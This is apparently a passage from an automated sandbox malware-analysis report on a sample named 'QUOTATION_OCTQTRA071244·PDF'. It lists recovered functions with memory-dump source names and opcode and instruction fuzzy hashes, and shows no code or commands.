Opcode Fuzzy Hash: eb9fc88f763a5df87577bfa1f4a0e4773f63ba99a17b5e68e8930310f8137484
Instruction Fuzzy Hash: 5731E631B0DA4D4FDBD4EB2C9068AB977E1EF99314F1541BAE08EC32A7CE25E8418741

Function 00007FFD9B80618D Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49f246ee74ffc2f44fb6410a1b372db8ff7a0fa6b22da93ae528f778566798a4
Instruction ID: b9d8b2fb842e7b71da4f3fdec49fe1f572d78f1761baf9d9b9b1e89d40bf00cf
Opcode Fuzzy Hash: 49f246ee74ffc2f44fb6410a1b372db8ff7a0fa6b22da93ae528f778566798a4
Instruction Fuzzy Hash: F1311331E1964E8EEB61FFA894596FD7BE0EF48318F0140B6E41CC60E2DE346294C781

Function 00007FFD9BA0B820 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d28fcfcf1ac5f718f3dd2c61e854cff84899414cc16b47121176a96cc1a42b9
Instruction ID: 1baf383867293327d11707b237388fa6f3470df3a8dcef6142a7a112fafa4cf1
Opcode Fuzzy Hash: 9d28fcfcf1ac5f718f3dd2c61e854cff84899414cc16b47121176a96cc1a42b9
Instruction Fuzzy Hash: 6821B621B1DC4E4FEAE8EB5D50A8AB973D1FFAD350F5541BAD04DC32A5CE24AD458380

Function 00007FFD9BA00511 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad04f49faa64f759221f6714ea632bc079a45ece95332fe3ec820d2453be7291
Instruction ID: 3455893d23dee1ab9f934b7cc49f80e276428e35df7c3ff03358c4f1640ea82a
Opcode Fuzzy Hash: ad04f49faa64f759221f6714ea632bc079a45ece95332fe3ec820d2453be7291
Instruction Fuzzy Hash: 60217822B1EF5E0BE7384B5C586547577D1EF9AB50B0683BAE0CD832A2DD44BC0243C5

Function 00007FFD9BA16C7E Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a2554555c2159a8fc2e299eaba1a0e65eab0d6937f01ba4f8bb9d4b77bf8af2
Instruction ID: 93318db3220a06405e01c8bfab38c443a6ff4111743a6d514a6721959c14fa73
Opcode Fuzzy Hash: 4a2554555c2159a8fc2e299eaba1a0e65eab0d6937f01ba4f8bb9d4b77bf8af2
Instruction Fuzzy Hash: 83212261F0E54E4FE7F09BAC64251FA7BA4DF46361F062076D40CC62A1D99C6A828381

Function 00007FFD9BA08535 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cbfcbcbf519d945437fefcb11d675f8bbb195081fca0edd6514c518c3875ffb
Instruction ID: ef188db974f8c3e4c7fe76a21ec9409971c0d6feecd796a3e9e0e44760af07ff
Opcode Fuzzy Hash: 3cbfcbcbf519d945437fefcb11d675f8bbb195081fca0edd6514c518c3875ffb
Instruction Fuzzy Hash: EE31F330A09A8E8FDBD4EF28C4647EA7BA0FF59304F1105AAE449C7296DF75E941CB40

Function 00007FFD9BA07CB0 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ef812c5465697683b69658829e882ae815ad46d7fccf1fd520683f97f22c132
Instruction ID: dfedcd37baa0f074d00ff76ede5158aca77c0cd678ea3a518cd0f3a687bba755
Opcode Fuzzy Hash: 4ef812c5465697683b69658829e882ae815ad46d7fccf1fd520683f97f22c132
Instruction Fuzzy Hash: 1E217F30719A0D4FDBE4EB2CD494A29B7D2FB98310F5115BAE04EC32A5CE75EC418741

Function 00007FFD9B80B585 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85a63c9461662193ddd3d59cdfda16ddea7b9e14a693db62fee135f54649685d
Instruction ID: e5e3f8c2838a262743adaf0c40c4f3077e1b5b968396f46a3e4141ca6afca773
Opcode Fuzzy Hash: 85a63c9461662193ddd3d59cdfda16ddea7b9e14a693db62fee135f54649685d
Instruction Fuzzy Hash: 7B21F13190978DCFCB05DF58C8655E97BB0FF19308B0902AAE85DC72A2DB34B655CB81

Function 00007FFD9BA0F151 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2ae2b636518638b8995a452eb4fcc04f37595ad7cbb19a75e4236b78c67d348
Instruction ID: 3e33761e8795caa51ba189a9bf97f61bd0648475d104455bec50351d05ccc6e1
Opcode Fuzzy Hash: b2ae2b636518638b8995a452eb4fcc04f37595ad7cbb19a75e4236b78c67d348
Instruction Fuzzy Hash: 07216721B0ED495FD768EB7C982566877E0EF8A310B0501BAE08DC32B3DD5AAC428380

Function 00007FFD9BA08CBA Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cbfa4f45ad046bb45dd186c972719a66524e34151b58c6f750f65fc6338c7a3
Instruction ID: b6e02e5105f7b29eafba486011fa2218169f98048b228c4cd2242ac88115c117
Opcode Fuzzy Hash: 1cbfa4f45ad046bb45dd186c972719a66524e34151b58c6f750f65fc6338c7a3
Instruction Fuzzy Hash: 32219271A1CB4C4FD768DF6C9495669B7E1FB99321F000A2ED4CAD36A1DB31F4428B41

Function 00007FFD9B80265E Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d451971e8e6cb69b073339a0bceef4abbfe240c7a3601b79313fb8a7497793aa
Instruction ID: 77e679a951a7047989b0061ea50f9d0063c951c184c5fbee89fcca5982e15ac6
Opcode Fuzzy Hash: d451971e8e6cb69b073339a0bceef4abbfe240c7a3601b79313fb8a7497793aa
Instruction Fuzzy Hash: 4F31D171E1954D4FE7A4DFAC90213AABBE1EF59340F1101BBE48DC72A6CE2458808781

Function 00007FFD9BA06440 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80f8a93bdf1ea22144c440271a10e8abc7c591d18169d8843192acff18844433
Instruction ID: 76a2869df34f73c1d3ffe2a83926940c1040236674763a0a7b737ee90cbc851f
Opcode Fuzzy Hash: 80f8a93bdf1ea22144c440271a10e8abc7c591d18169d8843192acff18844433
Instruction Fuzzy Hash: 5021657190CA1C4FDB68EE58DC4A9F9B7E4EBA9321F00413FD48ED3211DA71A5458B82

Function 00007FFD9B9630CF Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2338487089.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94f59ed4f87b783fdb25f38fcba2e67cb397b1ebe53738d4971d3f6b9af19124
Instruction ID: 5eee0160f718104d21a4481e6ad44c1cf2fb4bbfc5278f82c0d3cac9dd56e7e6
Opcode Fuzzy Hash: 94f59ed4f87b783fdb25f38fcba2e67cb397b1ebe53738d4971d3f6b9af19124
Instruction Fuzzy Hash: 3731C4B1E1A54DDFDF94DFA8C45A6EDBBB1FF68340F410579C409A3161DB38A5818B80

Function 00007FFD9BA13E55 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1018aca5ede1fcc568d3f90515eb826f25070c10f91a4c4297d56aa4446b69ee
Instruction ID: 217b217377158d6ebdeeb16552e2f68fe934f27a5c15868d37998239859995d1
Opcode Fuzzy Hash: 1018aca5ede1fcc568d3f90515eb826f25070c10f91a4c4297d56aa4446b69ee
Instruction Fuzzy Hash: 46212631B0EB9C5FD7699B7854292BA7BE1EF96211F0501BBD08AC72A3DD650C428381

Function 00007FFD9BA08550 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 587dd66a4ed4c09cbe3160221d4b0fe4760037b8790db702631da4c89b2729eb
Instruction ID: 17d00ea50670ee31dc6c3ca54085e5349159a28fe11af5fc5f47677c89b30b5d
Opcode Fuzzy Hash: 587dd66a4ed4c09cbe3160221d4b0fe4760037b8790db702631da4c89b2729eb
Instruction Fuzzy Hash: 2521CE30A18A4E8FDBD8EF28C464BAA73A1FF58304F4104A9E41EC7296CF75E951CB40

Function 00007FFD9BA02EE4 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3fa61d026d68235519bcaa21103df84e9c9cd029f3b202b2675566565b63da7
Instruction ID: 7952b1b0f85a0ed2fc6000870387ff5e1932d66dc95c7f2cf83ee787b5acd1d6
Opcode Fuzzy Hash: d3fa61d026d68235519bcaa21103df84e9c9cd029f3b202b2675566565b63da7
Instruction Fuzzy Hash: 1D210630B2AF498FE2B5A768502927973D2FF89350B5104B9C04EC32A6DE39A9438341

Function 00007FFD9BA03590 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24ec8a7d253b6fdc848284043cd4771ea9e37002e81316d17fd47e75b459978a
Instruction ID: 2a94c570293eab6f2141bdd2baee5e6ab61f7cf7e186f4f3ca8cfd1a093e4c15
Opcode Fuzzy Hash: 24ec8a7d253b6fdc848284043cd4771ea9e37002e81316d17fd47e75b459978a
Instruction Fuzzy Hash: 7B112C22B1ED0E0FE3B8AA5D685657672C1EFD9350B4641BDE44DC33AAEC14BC024340

Function 00007FFD9B80CDB5 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f55b5aa431eedb90e97b6aa918ad0c7ba536f64272d955fd6616dea271efbf8
Instruction ID: 4d6aba8fe5454f2b7e0fe584a515d30ae3dae946af234d2a7ae558b289aa80f1
Opcode Fuzzy Hash: 7f55b5aa431eedb90e97b6aa918ad0c7ba536f64272d955fd6616dea271efbf8
Instruction Fuzzy Hash: D0212636A0A54E8BEB10EF9CD8A99FD77A0FF58314F0501B3D44DC61A2CE30A5418A90

Function 00007FFD9B96340D Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2338487089.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e18855b570e21f4d5b472d97e4f886676ada8a5407ae86aba51977b70cdcea06
Instruction ID: 8fe3b132061470845c3d2c6fb5076afbeed24f59aa8107532689afc81b8989fa
Opcode Fuzzy Hash: e18855b570e21f4d5b472d97e4f886676ada8a5407ae86aba51977b70cdcea06
Instruction Fuzzy Hash: 13213EB5E1990E8FDFA4DF5CC4567E977B2FB68340F504169C44CD32A1CA346A818B80

Function 00007FFD9BA0AE96 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b287d0b741f302c402082a752fe9ac416eda7024f2805972783a1da596be54d1
Instruction ID: b811c3c27d9077b2dfec860621d3e759ef7f4f9f392aa7f5b796b449a17fcf2f
Opcode Fuzzy Hash: b287d0b741f302c402082a752fe9ac416eda7024f2805972783a1da596be54d1
Instruction Fuzzy Hash: 7A21E2F191E78E0FD379C754C8175A93BE0EF56200F1105BDC8DD87162E668261E8382

Function 00007FFD9B8029F3 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9d98dc7af059360ea9f5e2264cfcf3aa9503f6ed05d90c1154e0bf493f4defe
Instruction ID: 21d5c0a28a205001b2999cc2db3046364b8ebc0105b11b604cf2ea16ed26bd9f
Opcode Fuzzy Hash: e9d98dc7af059360ea9f5e2264cfcf3aa9503f6ed05d90c1154e0bf493f4defe
Instruction Fuzzy Hash: 87210232E1915A0FE764AFB4C4666F9B6D1EF49750F0600BAE48CC71E7DD689A414382

Function 00007FFD9B963344 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2338487089.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6445215a96bbe5f3d57821e404ab4e5bb2fb3f6e9d5b7659337b5e9d2b71694
Instruction ID: 57835eb5e39ba51f80124aff0db71b2ddfbac15dc3e1f361c1ebcbd798bd936c
Opcode Fuzzy Hash: e6445215a96bbe5f3d57821e404ab4e5bb2fb3f6e9d5b7659337b5e9d2b71694
Instruction Fuzzy Hash: 0D210CB5E1961EDFEFA4DFACC4566AA77B1FB68340F500139D409D3261DA34A9828B80

Function 00007FFD9B80C2F3 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0c521baef42a00d6906712f925cca04885af35947b000229d758a6b79228d04
Instruction ID: 336fb600c771b24ed91975138fbe940716d682404001ea32ccff4a50321cf950
Opcode Fuzzy Hash: f0c521baef42a00d6906712f925cca04885af35947b000229d758a6b79228d04
Instruction Fuzzy Hash: 9321B0369092998FDB55EB98D8A5AED37F0FF41319B0541A3E05CC61A3CA24A548C780

Function 00007FFD9B80C86D Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ec28ffbe389cc9db6195c46b24ec4f915ce62523bf139798e0e1f9ab537be79
Instruction ID: 4e55fdb5dc5490363e7d1dc8085c22cc9fcc04104db52e56be49d5d7bb686618
Opcode Fuzzy Hash: 4ec28ffbe389cc9db6195c46b24ec4f915ce62523bf139798e0e1f9ab537be79
Instruction Fuzzy Hash: 3321043690964D8FDB10EF5CD8A9AE93BA0FF49318F0542B2D45CC7192CE30A444CB80

Function 00007FFD9BA15E98 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8620be89aa6b522a57b0951b92392f5a93f5a5167fccf19d102fc33e0d774cd3
Instruction ID: c946960b29c0a9c9dadaaae31de636ea0beb6629de2d9e29770dd19e5df0078a
Opcode Fuzzy Hash: 8620be89aa6b522a57b0951b92392f5a93f5a5167fccf19d102fc33e0d774cd3
Instruction Fuzzy Hash: 6111E431A1EB8D4FDBB5DB5C88246A53BE1FF59310F0901AAE45DC31A2DE64ED048381

Function 00007FFD9BA0FB69 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53b39fbc54d7c473b603590c0d1a3f4d4bb17ca73be178daec620ccb7bb7b7af
Instruction ID: bf363574e1214783865a4bf92256cc3c0bf05a26052f55f7a247c2a669759f8b
Opcode Fuzzy Hash: 53b39fbc54d7c473b603590c0d1a3f4d4bb17ca73be178daec620ccb7bb7b7af
Instruction Fuzzy Hash: E601457260E74C6EE7268668AC175F23BD4DB93630B01027BE0C9C3062E851685782E2

Function 00007FFD9B9635FA Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2338487089.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32d0173c6bcac3ff759220e9455ed736dcdeeb8b75ef4a6d0a632ae118ca2f1c
Instruction ID: c181edab1e92e165f37ac58bb0709e8debffe9a65a606fd5908a02c67d21748c
Opcode Fuzzy Hash: 32d0173c6bcac3ff759220e9455ed736dcdeeb8b75ef4a6d0a632ae118ca2f1c
Instruction Fuzzy Hash: 612171B1E1A50DDFEBA49F9C881A7EA77B1FF68350F1101BAC44D93261DA345A858B80

Function 00007FFD9B80E259 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b7307b1199c8bbb5b4364095c2df7cf6a904a9ad3fff9f07c284be58c87eb63
Instruction ID: fe5aab409e3f406838ddda4868d68a2b584cbb5997a7843e5c9a2d73c79778a1
Opcode Fuzzy Hash: 0b7307b1199c8bbb5b4364095c2df7cf6a904a9ad3fff9f07c284be58c87eb63
Instruction Fuzzy Hash: C6219F71E0E68E8FEB65EF6888645EA7BE0FF19341F0501BAE058C71A2DA34A940C741

Function 00007FFD9BA0AE70 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0502c7495e3e08a2953120c1d260d3fce710884df2f8a9d5547d2d358e9c47ce
Instruction ID: 2d98fa893c0494db64915511b8b68efd7e2e7c76347af52f0dc9e117cef77b05
Opcode Fuzzy Hash: 0502c7495e3e08a2953120c1d260d3fce710884df2f8a9d5547d2d358e9c47ce
Instruction Fuzzy Hash: 0B11EEB191E78E4FD778DB48C81769937D0EF56300F2106B8C8CD831A1E668661E83C2

Function 00007FFD9BA0C080 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ecad7f976d5f4c2abbfb23f65781bf5ef64c46a44f3580d5b52fa578338d4ed
Instruction ID: 91cfa8e9f6e3c2c60bd130d7e5ff2d6df0d1ba1cb649e8a79d11036167ca5f2a
Opcode Fuzzy Hash: 2ecad7f976d5f4c2abbfb23f65781bf5ef64c46a44f3580d5b52fa578338d4ed
Instruction Fuzzy Hash: A101082172DD490BD7A8A718A055EFBB3D1EBE8314F11467EE44EC32D6DD69B9058380

Function 00007FFD9BA00530 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8fa53ad59485fb0fbf88f8e8e24071006ff4b8fab1caab58754e4872669e023
Instruction ID: e0c2de1c2482984e5238a12df780f9d28107b65fa2377c058434763bb7e6f737
Opcode Fuzzy Hash: b8fa53ad59485fb0fbf88f8e8e24071006ff4b8fab1caab58754e4872669e023
Instruction Fuzzy Hash: 35018932B1DF1E0BDB3C9A1C68268B673D0EF99B60B06467AE08DC3292DD04BC0143C6

Function 00007FFD9B806950 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cce7281701dcf95a04f661373bb6135c662309875c9b3b93a9d4ad2ffa4351e
Instruction ID: 54082b64ec155a1095c9bc1930dde36a63656f723ac9751ce6f8f9e946817e85
Opcode Fuzzy Hash: 7cce7281701dcf95a04f661373bb6135c662309875c9b3b93a9d4ad2ffa4351e
Instruction Fuzzy Hash: A7110430B0D68D8FDB64EFA890642FE7BB0EF89315F0500BED049E72A1CA755940C790

Function 00007FFD9B963C0B Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2338487089.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd90aaa6f430f23f6ea73240790ac0c764c12d16908640ee067aed8f7b9821b7
Instruction ID: 19f19a76a1b6ff919e5448fd9c486664f464a6179dd21b44fa7c739b6dac8b37
Opcode Fuzzy Hash: cd90aaa6f430f23f6ea73240790ac0c764c12d16908640ee067aed8f7b9821b7
Instruction Fuzzy Hash: B4218330E1651DCEEBA8DFA8C4A56EDB7B2FF58341F510079D009A32A1CA75A942CB40

Function 00007FFD9B80B434 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0c8b729fe9b2cab455206d70c258d2477db70f22a9a289adeb31454c556690e
Instruction ID: 33675635d7e3739a09b4135b0bc75fe1058098c818767babaeb2a9c9e8d6bc5f
Opcode Fuzzy Hash: a0c8b729fe9b2cab455206d70c258d2477db70f22a9a289adeb31454c556690e
Instruction Fuzzy Hash: 37118F31A09A4E8FDB55EF58D859AFD77B0FF54314F0405AAE41DC61A2DB30A650CB40

Function 00007FFD9BA1C477 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a7996acc5891794c938ac58c7430be42068ddde3369be4fd299974e98d5ddde
Instruction ID: d7e89f31c8eeff15bb4c0a2967cc952739125dd0ff4edce53005a420618ff9ce
